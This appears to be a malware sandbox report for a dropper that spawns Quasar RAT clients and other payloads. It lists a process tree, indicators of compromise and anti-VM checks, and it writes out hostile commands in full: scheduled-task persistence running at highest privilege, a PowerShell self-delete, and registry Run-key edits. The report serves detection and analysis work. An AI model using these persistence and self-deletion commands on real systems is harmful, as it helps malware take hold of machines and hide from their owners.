pid Process 1264 random.exe 1264 random.exe 1088 axplong.exe 1088 axplong.exe 3832 axplong.exe 3832 axplong.exe 3896 axplong.exe 3896 axplong.exe 1840 axplong.exe 1840 axplong.exe 3484 TROJAN~1.EXE 3484 TROJAN~1.EXE 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1792 winn.exe 1368 axplong.exe 1368 axplong.exe 4980 powershell.exe 4980 powershell.exe 4980 powershell.exe 4496 axplong.exe 4496 axplong.exe 2892 axplong.exe 2892 axplong.exe 556 2946613613.exe 556 2946613613.exe 2124 axplong.exe 2124 axplong.exe 788 axplong.exe 788 axplong.exe 2268 axplong.exe 2268 axplong.exe 3576 axplong.exe 3576 axplong.exe 3360 axplong.exe 3360 axplong.exe 4316 axplong.exe 4316 axplong.exe 4980 wmic.exe 4980 wmic.exe 4980 wmic.exe 4980 wmic.exe 3484 TROJAN~1.EXE 1080 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1808 4363463463464363463463463.exe Token: SeDebugPrivilege 3048 client.exe Token: SeDebugPrivilege 3104 Client.exe Token: SeDebugPrivilege 404 plswork.exe Token: SeDebugPrivilege 396 Client.exe Token: SeDebugPrivilege 3020 Client.exe Token: SeDebugPrivilege 1992 Client.exe Token: SeDebugPrivilege 1792 winn.exe Token: SeDebugPrivilege 1792 winn.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 556 2946613613.exe Token: SeDebugPrivilege 3484 TROJAN~1.EXE Token: SeIncreaseQuotaPrivilege 4980 wmic.exe Token: SeSecurityPrivilege 4980 wmic.exe Token: SeTakeOwnershipPrivilege 4980 wmic.exe Token: SeLoadDriverPrivilege 4980 wmic.exe Token: SeSystemProfilePrivilege 4980 wmic.exe Token: SeSystemtimePrivilege 4980 wmic.exe Token: SeProfSingleProcessPrivilege 4980 wmic.exe Token: SeIncBasePriorityPrivilege 4980 wmic.exe Token: SeCreatePagefilePrivilege 4980 wmic.exe Token: SeBackupPrivilege 4980 wmic.exe Token: SeRestorePrivilege 4980 wmic.exe Token: SeShutdownPrivilege 4980 wmic.exe Token: SeDebugPrivilege 4980 wmic.exe Token: SeSystemEnvironmentPrivilege 4980 wmic.exe Token: SeRemoteShutdownPrivilege 4980 wmic.exe Token: SeUndockPrivilege 4980 wmic.exe Token: SeManageVolumePrivilege 4980 wmic.exe Token: 33 4980 wmic.exe Token: 34 4980 wmic.exe Token: 35 4980 wmic.exe Token: 36 4980 wmic.exe Token: SeIncreaseQuotaPrivilege 4980 wmic.exe Token: SeSecurityPrivilege 4980 wmic.exe Token: SeTakeOwnershipPrivilege 4980 wmic.exe Token: SeLoadDriverPrivilege 4980 wmic.exe Token: SeSystemProfilePrivilege 4980 wmic.exe Token: SeSystemtimePrivilege 4980 wmic.exe Token: SeProfSingleProcessPrivilege 4980 wmic.exe Token: SeIncBasePriorityPrivilege 4980 wmic.exe Token: SeCreatePagefilePrivilege 4980 wmic.exe Token: SeBackupPrivilege 4980 wmic.exe Token: SeRestorePrivilege 4980 wmic.exe Token: SeShutdownPrivilege 4980 wmic.exe Token: SeDebugPrivilege 4980 wmic.exe Token: SeSystemEnvironmentPrivilege 4980 wmic.exe Token: SeRemoteShutdownPrivilege 4980 wmic.exe Token: SeUndockPrivilege 4980 wmic.exe Token: SeManageVolumePrivilege 4980 wmic.exe Token: 33 4980 wmic.exe Token: 34 4980 wmic.exe Token: 35 4980 wmic.exe Token: 36 4980 wmic.exe Token: SeDebugPrivilege 1080 powershell.exe Token: SeIncreaseQuotaPrivilege 1080 powershell.exe Token: SeSecurityPrivilege 1080 powershell.exe Token: SeTakeOwnershipPrivilege 1080 powershell.exe Token: SeLoadDriverPrivilege 1080 powershell.exe Token: SeSystemProfilePrivilege 1080 powershell.exe Token: SeSystemtimePrivilege 1080 powershell.exe Token: SeProfSingleProcessPrivilege 1080 powershell.exe Token: SeIncBasePriorityPrivilege 1080 powershell.exe Token: SeCreatePagefilePrivilege 1080 powershell.exe -
Suspicious use of FindShellTrayWindow 22 IoCs
pid Process 3020 Client.exe 3420 AA_v3.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe -
Suspicious use of SendNotifyMessage 22 IoCs
pid Process 3020 Client.exe 3420 AA_v3.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe 4036 dwm.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3020 Client.exe 1992 Client.exe 1276 XClient.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1808 wrote to memory of 2920 1808 4363463463464363463463463.exe 88 PID 1808 wrote to memory of 2920 1808 4363463463464363463463463.exe 88 PID 1808 wrote to memory of 2920 1808 4363463463464363463463463.exe 88 PID 2920 wrote to memory of 1456 2920 dxwebsetup.exe 89 PID 2920 wrote to memory of 1456 2920 dxwebsetup.exe 89 PID 2920 wrote to memory of 1456 2920 dxwebsetup.exe 89 PID 1456 wrote to memory of 2388 1456 dxwebsetup.exe 90 PID 1456 wrote to memory of 2388 1456 dxwebsetup.exe 90 PID 1456 wrote to memory of 2388 1456 dxwebsetup.exe 90 PID 1808 wrote to memory of 2844 1808 4363463463464363463463463.exe 91 PID 1808 wrote to memory of 2844 1808 4363463463464363463463463.exe 91 PID 1808 wrote to memory of 2844 1808 4363463463464363463463463.exe 91 PID 2844 wrote to memory of 3048 2844 svchost.com 92 PID 2844 wrote to memory of 3048 2844 svchost.com 92 PID 3048 wrote to memory of 1856 3048 client.exe 93 PID 3048 wrote to memory of 1856 3048 client.exe 93 PID 3048 wrote to memory of 1352 3048 client.exe 95 PID 3048 wrote to memory of 1352 3048 client.exe 95 PID 3048 wrote to memory of 1352 3048 client.exe 95 PID 1352 wrote to memory of 4584 1352 Client.exe 96 PID 1352 wrote to memory of 4584 1352 Client.exe 96 PID 1352 wrote to memory of 4584 1352 Client.exe 96 PID 4584 wrote to memory of 3104 4584 svchost.com 97 PID 4584 wrote to memory of 3104 4584 svchost.com 97 PID 3104 wrote to memory of 4608 3104 Client.exe 98 PID 3104 wrote to memory of 4608 3104 Client.exe 98 PID 1808 wrote to memory of 2792 1808 4363463463464363463463463.exe 101 PID 1808 wrote to memory of 2792 1808 4363463463464363463463463.exe 101 PID 1808 wrote to memory of 2792 1808 4363463463464363463463463.exe 101 PID 2792 wrote to memory of 404 2792 svchost.com 102 PID 2792 wrote to memory of 404 2792 svchost.com 102 PID 3104 wrote to memory of 1988 3104 Client.exe 103 PID 3104 wrote to memory of 1988 3104 Client.exe 103 PID 3104 wrote to memory of 1988 3104 Client.exe 103 PID 1988 wrote to memory of 2816 1988 Client.exe 104 PID 1988 wrote to memory of 2816 1988 Client.exe 104 PID 1988 wrote to memory of 2816 1988 Client.exe 104 PID 2816 wrote to memory of 396 2816 svchost.com 105 PID 2816 wrote to memory of 396 2816 svchost.com 105 PID 404 wrote to memory of 2368 404 plswork.exe 106 PID 404 wrote to memory of 2368 404 plswork.exe 106 PID 404 wrote to memory of 3020 404 plswork.exe 108 PID 404 wrote to memory of 3020 404 plswork.exe 108 PID 396 wrote to memory of 2352 396 Client.exe 109 PID 396 wrote to memory of 2352 396 Client.exe 109 PID 396 wrote to memory of 1992 396 Client.exe 111 PID 396 wrote to memory of 1992 396 Client.exe 111 PID 3020 wrote to memory of 4420 3020 Client.exe 112 PID 3020 wrote to memory of 4420 3020 Client.exe 112 PID 1992 wrote to memory of 3808 1992 Client.exe 114 PID 1992 wrote to memory of 3808 1992 Client.exe 114 PID 1808 wrote to memory of 1692 1808 4363463463464363463463463.exe 116 PID 1808 wrote to memory of 1692 1808 4363463463464363463463463.exe 116 PID 1808 wrote to memory of 1692 1808 4363463463464363463463463.exe 116 PID 1692 wrote to memory of 1792 1692 svchost.com 117 PID 1692 wrote to memory of 1792 1692 svchost.com 117 PID 1808 wrote to memory of 4540 1808 4363463463464363463463463.exe 118 PID 1808 wrote to memory of 4540 1808 4363463463464363463463463.exe 118 PID 1808 wrote to memory of 4540 1808 4363463463464363463463463.exe 118 PID 4540 wrote to memory of 1564 4540 svchost.com 119 PID 4540 wrote to memory of 1564 4540 svchost.com 119 PID 1808 wrote to memory of 4332 1808 4363463463464363463463463.exe 121 PID 1808 wrote to memory of 4332 1808 4363463463464363463463463.exe 121 PID 1808 wrote to memory of 4332 1808 4363463463464363463463463.exe 121 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1984 Process not Found 4892 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3624
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe"C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies system executable filetype association
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
PID:2388
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\client.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\Files\client.exeC:\Users\Admin\AppData\Local\Temp\Files\client.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:1856
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exeC:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:4608
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"9⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exeC:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:2352
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f12⤵
- Scheduled Task/Job: Scheduled Task
PID:3808
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Users\Admin\AppData\Local\Temp\Files\plswork.exeC:\Users\Admin\AppData\Local\Temp\Files\plswork.exe4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2368
-
-
C:\Windows\system32\SubDir\Client.exe"C:\Windows\system32\SubDir\Client.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:4420
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\Files\winn.exeC:\Users\Admin\AppData\Local\Temp\Files\winn.exe4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\winn.exe' -Force5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE4⤵
- Executes dropped EXE
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2436
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4332 -
C:\Users\Admin\AppData\Local\Temp\Files\soft.exeC:\Users\Admin\AppData\Local\Temp\Files\soft.exe4⤵
- Executes dropped EXE
PID:5012
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\Files\random.exeC:\Users\Admin\AppData\Local\Temp\Files\random.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1264 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1088 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"7⤵
- Executes dropped EXE
PID:1796 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3832 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"9⤵
- Executes dropped EXE
PID:556 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3896 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4612 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe12⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1840 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"13⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4312 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe14⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1368 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"15⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe16⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4496 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"17⤵
- Executes dropped EXE
PID:4560 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe18⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2892 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"19⤵
- Executes dropped EXE
PID:4668 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe20⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2124 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"21⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe22⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:788 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"23⤵
- Executes dropped EXE
PID:3996 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe24⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2268 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"25⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3000 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe26⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3576 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"27⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1856 -
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe28⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4316
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\m.exe"3⤵
- Executes dropped EXE
PID:2892 -
C:\Users\Admin\AppData\Local\Temp\Files\m.exeC:\Users\Admin\AppData\Local\Temp\Files\m.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1968 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe5⤵
- Executes dropped EXE
PID:1296 -
C:\Users\Admin\AppData\Local\Temp\2946613613.exeC:\Users\Admin\AppData\Local\Temp\2946613613.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵
- Executes dropped EXE
PID:2076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f8⤵PID:3896
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f9⤵
- Modifies registry key
PID:2172
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"7⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:676 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager8⤵PID:3348
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /f /tn Windows Upgrade Manager9⤵PID:3256
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\248483651.exeC:\Users\Admin\AppData\Local\Temp\248483651.exe6⤵
- Executes dropped EXE
PID:3288 -
C:\Users\Admin\AppData\Local\Temp\3058827245.exeC:\Users\Admin\AppData\Local\Temp\3058827245.exe7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\322341857.exeC:\Users\Admin\AppData\Local\Temp\322341857.exe6⤵
- System Location Discovery: System Language Discovery
PID:2332
-
-
C:\Users\Admin\AppData\Local\Temp\2767925072.exeC:\Users\Admin\AppData\Local\Temp\2767925072.exe6⤵PID:3852
-
C:\Users\Admin\AppData\Local\Temp\2928124777.exeC:\Users\Admin\AppData\Local\Temp\2928124777.exe7⤵PID:3592
-
-
-
C:\Users\Admin\AppData\Local\Temp\2578412766.exeC:\Users\Admin\AppData\Local\Temp\2578412766.exe6⤵PID:3432
-
C:\Users\Admin\sysnldcvmr.exeC:\Users\Admin\sysnldcvmr.exe7⤵PID:716
-
C:\Users\Admin\AppData\Local\Temp\513022960.exeC:\Users\Admin\AppData\Local\Temp\513022960.exe8⤵PID:2996
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f9⤵PID:1460
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f10⤵PID:2548
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f11⤵
- Modifies registry key
PID:2824
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"9⤵PID:4008
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager10⤵PID:2812
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /f /tn Windows Upgrade Manager11⤵PID:1088
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\287511317.exeC:\Users\Admin\AppData\Local\Temp\287511317.exe8⤵PID:756
-
-
C:\Users\Admin\AppData\Local\Temp\154057176.exeC:\Users\Admin\AppData\Local\Temp\154057176.exe8⤵PID:3064
-
-
C:\Users\Admin\AppData\Local\Temp\520429473.exeC:\Users\Admin\AppData\Local\Temp\520429473.exe8⤵PID:4764
-
-
-
-
-
